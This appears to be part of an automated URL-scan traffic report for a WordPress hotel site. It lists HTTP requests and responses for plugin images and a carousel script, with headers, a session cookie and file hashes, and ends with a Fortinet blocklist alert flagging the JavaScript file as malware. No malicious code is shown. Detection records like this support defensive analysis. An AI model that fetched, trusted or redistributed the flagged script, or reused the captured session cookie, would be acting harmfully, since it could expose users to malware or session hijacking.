Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 01:26:33 GMT
Accept-Ranges: bytes
Content-Length: 4292
Keep-Alive: timeout=3, max=90
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 410x250, components 3\012- data
Size:   4292
Md5:    a11a4b7762ed3a1a10ad518b5b51155d
Sha1:   2d40b94fdc840fc0d20d188166794a7b8a815f5a
Sha256: 32beaeb98ff806564caae3063caa4c91500480f2680293cbfcb083f5d6c2f35b
                                        
                                            GET /wp-content/plugins/travel-agency-companion//includes/images/img8.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 68208
Keep-Alive: timeout=3, max=90
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 630x630, components 3\012- data
Size:   68208
Md5:    3d3050cf3739b4a39dd2f6d3b3f9d65b
Sha1:   e498b6319be235218f4f85f39f876f3fad8a4069
Sha256: e19121217e2f4d8b9547242e3fb79a5fc6ca1f9a37b81b4a0aee2146a8b66dd2
                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img20.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 100123
Keep-Alive: timeout=3, max=88
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x650, components 3\012- data
Size:   100123
Md5:    92b778b8beadda595381ece697b17d45
Sha1:   8cc1c42929d7f35b907a447c4a4e09866718929c
Sha256: 60444d1d58bdfa94b3fee4da8fba717c2fc8ed62db854168c3656e591d25c050
                                        
                                            GET /wp-content/plugins/travel-agency-companion/includes/images/img25.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 228793
Keep-Alive: timeout=3, max=90
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x513, components 3\012- data
Size:   228793
Md5:    484e6a4d6d66220fae3936642594b306
Sha1:   c72a2ea6ffaeefdf3a96fd244f357c4cb1660915
Sha256: 560b801509089f04fbb051619718e2eb5556921be3b83dd2cb2d5e28b936c3f6
                                        
                                            GET /wp-content/uploads/2018/08/icon.jpg HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 01 Dec 2022 12:45:50 GMT
Server: Apache
Last-Modified: Fri, 17 Aug 2018 03:00:27 GMT
Accept-Ranges: bytes
Content-Length: 1948
Keep-Alive: timeout=3, max=91
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 55x38, components 3\012- data
Size:   1948
Md5:    ac8d2c08b7dfd8a48726875cf8ae2e41
Sha1:   784156736088003b49e117c7b87c27e98eee199e
Sha256: ab454661c039982ec304a469d5edc41a821cf54aabfe3c714a0403b839c6a324
                                        
                                            GET /wp-content/plugins/travel-agency-companion/public/js/owl.carousel.js?ver=2.2.1 HTTP/1.1 
Host: www.hotelsweb.site
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.hotelsweb.site/
Cookie: PHPSESSID=4e997f8d2e9eb7c23438de536758770d

search
                                         199.250.192.223
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Thu, 01 Dec 2022 12:45:49 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2018 03:40:35 GMT
Accept-Ranges: bytes
Content-Length: 88643
Keep-Alive: timeout=3, max=95
Connection: Keep-Alive


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Malware